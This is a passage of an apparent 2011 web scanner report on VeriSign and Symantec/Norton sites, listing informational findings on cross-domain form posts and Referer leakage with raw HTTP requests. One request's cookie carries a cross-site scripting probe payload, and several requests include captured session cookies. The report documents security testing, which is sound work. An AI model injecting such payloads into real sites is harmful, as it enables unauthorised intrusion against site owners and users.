Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.15. http://query.verisign.ch/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do"
target="_blank">

                                   <div>
...[SNIP]...

13.16. http://query.verisign.ch/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://query.verisign.ch
Path:   /search

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /search HTTP/1.1
Host: query.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:19 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
Content-Length: 43489
Connection: close


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html><head>
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7">
<meta http
...[SNIP]...
</h4>
                       <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.17. https://renewals.symantec.com/renewals/chat_form.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/chat_form.jsp

Issue detail

The page contains a form which POSTs data to the domain admin.instantservice.com. The form contains the following fields:

Request

GET /renewals/chat_form.jsp HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: https://renewals.symantec.com/renewals/application?page=renewal_search.jsp&action=button(submit)
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc96f20"%3balert(document.location)//6e6ee0889dd&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; JSESSIONID=kTPJTqGNKfPrjNnpLGPypQ8JJCYnkLr5W1R124KMsH1FBQvFMQ07!1524362598; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_pers=%20s_nr%3D1315622354515-New%7C1336358354515%3B%20event69%3Devent69%7C1336358354517%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dsymantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den/us%2525253ASMBStore%2525253ALRC%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%2526rmkr-symlrc-cust-prod%253D%252526pid%25253DsymRen%2525253ALRC%2525253ARenewals%2525253ARenewal%25252520Search%252526pidt%25253D1%252526oid%25253Djavascript%2525253AchatWithSales%25252528%25252529%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:39:05 GMT
Content-Type: text/html
Content-Length: 15726

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- BEGIN IMPORT_INCLUDE-->


<!--END IMPORT_INCLUDE-->


<html>
<head><ti
...[SNIP]...
<body>


<FORM action="https://admin.instantservice.com/Customer" method="post" name="custform">

<INPUT TYPE="HIDDEN" NAME="ai" VALUE="6227">
...[SNIP]...

13.18. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...

13.19. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
</h4>
                       <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.20. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...

13.21. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
</h4>
                       <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.22. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag
...[SNIP]...
</h4>
                       <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.23. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" languag
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...

13.24. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
<div class="partner_form">
                               <form name="logonForm" id="partner_login" method="post" action="https://products.verisign.com/geocenter/reseller/logon.do" target="_blank">
                                   <div>
...[SNIP]...

13.25. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
</h4>
                       <form method="post" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" id="myacc_search" target="_top">
                           <fieldset id="myacc_fieldset">
...[SNIP]...

14. Cross-domain Referer leakage
There are 70 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


14.1. http://blogs.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?tid=footer HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 20:19:01 GMT
ETag: "1a606f6-9f7a-c8827740"
Accept-Ranges: bytes
Content-Length: 40826
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
       <meta http-equiv="X-UA-Compatible" content="IE=7" />
       <
...[SNIP]...
<li><a href="http://www.verisign.be/">Belgium</a>
...[SNIP]...
<li><a href="http://www.verisignchina.com.cn/">China</a>
...[SNIP]...
<li><a href="http://www.verisign.dk/">Denmark</a>
...[SNIP]...
<li><a href="http://www.verisign.fr/">France</a>
...[SNIP]...
<li><a href="http://www.verisign.de/">Germany</a>
...[SNIP]...
<li><a href="http://www.verisign.in/">India</a>
...[SNIP]...
<li><a href="http://www.verisign.it/">Italy</a>
...[SNIP]...
<li><a href="http://www.verisign.es/">Spain</a>
...[SNIP]...
<li><a href="http://www.verisign.se/">Sweden</a>
...[SNIP]...
<li><a href="http://www.verisign.ch/">Switzerland</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.com&amp;lang=en">
...[SNIP]...
<li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do">Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-user" class="blueContentTitle">User Authentication Blog</a>
...[SNIP]...
<div class="images">
                               <a href="http://www.symantec.com/connect/blogs/authentication-user"><img src="//www.verisign.com/images/symc-blogs.jpg" alt="User Authentication Blog" /></a>
                               <a href="http://www.symantec.com/connect/item-feeds/blog/691,29681/feed/all/all"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
<p class="title"><a href="http://www.symantec.com/connect/blogs/authentication-business" class="blueContentTitle">Business Authentication Blog</a>
...[SNIP]...
<div class="images">
                               <a href="http://www.symantec.com/connect/blogs/authentication-business"><img src="//www.verisign.com/images/symc-blogs.jpg" alt="Business Authentication Blog" /></a>
                               <a href="http://www.symantec.com/connect/item-feeds/blog/691,29651/feed/all/all"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
</a>
                               <a href="http://feeds.feedburner.com/WebUserExperienceBlog"><img src="//www.verisign.com/images/rssIcon.gif" class="rssIcon" alt="RSS" />
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href="http://www.symantec.com" rel="external">Symantec Corp.</a>
...[SNIP]...

14.2. http://buy.norton.com/estore/mf/landingProductFeatures

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /estore/mf/landingProductFeatures

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Date: Fri, 09 Sep 2011 21:31:18 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 55880
Connection: Keep-Alive


<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6 en" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-js ie7 en" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="no-js i
...[SNIP]...
<div id="globalNavMainInner1">
<a href="http://www.symantec.com/norton">Norton</a>
...[SNIP]...
<div id="globalNavMainInner2">
<a href="http://www.symantec.com/business">Business</a>
...[SNIP]...
<div id="globalNavMainInner3">
<a href="http://www.symantec.com/partners">Partners</a>
...[SNIP]...
<div id="globalNavMainInner5">
<a href="http://www.symantec.com/about">About Symantec</a>
...[SNIP]...
<div class="lftNavMainNav">
<a href="http://www.symantec.com/norton/downloads/index.jsp" title="" class="lftNavArrowMargin"><span>
...[SNIP]...
<div class="lftNavMainNav">
<a title="" class=" lftNavArrowMargin" href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN">Find My Order </a>
...[SNIP]...
<li>
<a target="_parent" href="http://www.symantec.com/home_homeoffice/support/special/upgrade2007/">Norton Update Center</a>
...[SNIP]...
<div class="verisign">
<a target="_blank" title="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=buy.norton.com&lang=en">
<img title="Verisign" src="//buy-static.norton.com/estore/images//en/Non-Product/Logo/partner_logo/logo_verisign.png">
...[SNIP]...
<div class="            medBusinessUpgrade positioning
   ">
                       <a href="http://store.symantec.com/?inid=us_estore">
                           <img width="718" height="75" src="//buy-static.norton.com/estore/images/en/Non-Product/Ad_Objects/bnr_smb_protectyourbiz_718.png">
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span><a target="_blank" href="http://www.myNortonAccount.com ">Norton Account</a>
...[SNIP]...
<span><a target="_blank" href="http://www.symantec.com/about/profile/policies/eulas">License Agreements </a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a target="_blank" href="http://www.symantec.com/feedback/">Contact Us</a>
...[SNIP]...

14.3. http://buy.norton.com/estore/mf/upgradeRenewal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://buy.norton.com
Path:   /estore/mf/upgradeRenewal

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
